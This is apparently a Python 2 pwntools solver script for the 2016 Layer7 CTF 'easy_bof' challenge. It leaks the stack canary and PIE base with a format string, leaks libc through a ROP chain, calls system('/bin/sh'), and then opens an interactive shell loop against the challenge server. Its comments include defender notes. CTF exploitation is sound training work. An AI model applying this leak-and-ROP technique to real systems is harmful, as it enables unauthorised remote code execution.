

2016 Layer7 CTF easy_bof exploit only

from pwn import *


# Solver script for the 2016 Layer7 CTF "easy_bof" challenge (Python 2 / pwntools:
# print statements, raw_input, str payloads). The whole script is one linear
# conversation with the remote service, so its statements are order-dependent.
#
# Walkthrough (as far as the code itself shows):
#   1. one format-string leak recovers the stack canary and a code address,
#      which defeats both the canary and PIE in a single step;
#   2. a first ROP chain prints a GOT entry to learn where libc is loaded;
#   3. a second ROP chain calls system("/bin/sh") with the derived addresses.
#
# Lesson for defenders: the canary and PIE were in place but were nullified by
# a single information leak. The root cause to fix is passing user-controlled
# data as the printf format argument (-Wformat-security / -Werror=format
# catches it at compile time; glibc's fortified printf, _FORTIFY_SOURCE=2,
# also aborts on "%N$" specifiers that skip arguments like the ones below).
conn = remote('prob.layer7.kr', 10003)


# First input line: a number larger than INT_MAX (2**31 + 2). The check it is
# meant to get past is not visible in this script; presumably the service
# compares it as a signed 32-bit value — confirm against the binary.
payload = "2147483650\n"

# Second input line is used by the service as a printf format string (inferred
# from the replies read below). "%43$lx" / "%41$lx" print the 43rd and 41st
# variadic arguments as hex longs, i.e. two values lying on the stack.
payload += "%43$lx%41$lx"


conn.send(payload)


# Replies come back as hex text: 16 hex chars = 8-byte canary,
# 12 hex chars = a 48-bit userland code address ("start").
canary = conn.recv(16)

start = conn.recv(12)


print "canary : " + canary

print "start : " + start


# The leaked code address sits at a fixed offset (0x7e0) from the PIE base,
# so subtracting it yields the load base of the binary for this run.
base_addr = int(start,16) - 0x7e0


# Binary-relative offsets (PLT stubs, GOT slots, a return target and one ROP
# gadget), rebased onto the leaked PIE base. printf_plt, puts_got, read_plt
# and read_got are computed but never used by the chains below.
printf_plt = base_addr + 0x00000000000007A0

fflush_got = base_addr + 0x0000000000200FD8


puts_plt = base_addr + 0x0000000000000790

puts_got = base_addr + 0x0000000000200FA8


read_plt = base_addr + 0x00000000000007A8

read_got = base_addr + 0x0000000000200FC0


# "boom": the address the first chain returns to after the leak; from the
# second round of input below it appears to re-enter the vulnerable routine
# — not verifiable from this script alone.
boom = base_addr + 0x0000000000000910


# pop rdi ; ret gadget (x86-64 SysV: rdi carries the first argument).
poprdiret = base_addr + 0x0000000000000a53


print "base_addr : " + hex(base_addr)


# Canary was read as hex text; convert to an int so p64() can re-embed it.
canary = int(canary, 16)


# Stack layout implied by the padding: 264 bytes of buffer, then the canary,
# then 8 bytes (saved rbp), then the saved return address where the chain starts.
payload = "A" * 264

payload += p64(canary)


payload += "A" * 8


# Chain 1: puts(fflush_got) — print the resolved libc address of fflush —
# then continue at "boom".
payload += p64(poprdiret)

payload += p64(fflush_got)

payload += p64(puts_plt)

payload += p64(boom)


conn.send(payload + "\n")



#-------------------------------------------------------------


# Second round: same overflow trigger, but a harmless format string this time.
payload = "2147483650\n"

payload += "aa"


conn.send(payload+"\n")


# puts() prints the 6 significant bytes of the pointer followed by '\n';
# the 8 bytes read here therefore end in 0x0a and one 0x61 ('a', presumably
# the start of the next reply). In the little-endian u64 those occupy the two
# high bytes, so 0x610a000000000000 is subtracted to strip them.
fflush_addr = u64(conn.recv(8)) - 0x610a000000000000

# libc-internal deltas: fflush - system and fflush - "/bin/sh". These are
# specific to the libc build the challenge ran with (not named here).
fflush_system = 0x000000000006D750 - 0x0000000000045380

fflush_binsh = 0x000000000006D750 - 0x000000000018C58B


system_addr = fflush_addr - fflush_system

binsh_addr = fflush_addr - fflush_binsh


print hex(fflush_addr)


# Drain whatever else the service printed before sending the final chain.
print conn.recv(1024)


# Chain 2: same stack layout as chain 1, then system("/bin/sh").
payload = "A" * 264


payload += p64(canary)

payload += "A" * 8


payload += p64(poprdiret)

payload += p64(binsh_addr)

payload += p64(system_addr)

# Trailing 8 bytes after the system() return slot; role not evident here.
payload += "A"*8


conn.send(payload)



# Minimal interactive shell loop: forward each typed line, print the reply.
# conn.recv(1024) returns whatever is available, so long outputs may be cut.
while True:

        cmd = raw_input('$ ')

        conn.send(cmd+"\n")

        print conn.recv(1024)



PIE 옵션이 걸려있어서 조금 까다로운 문제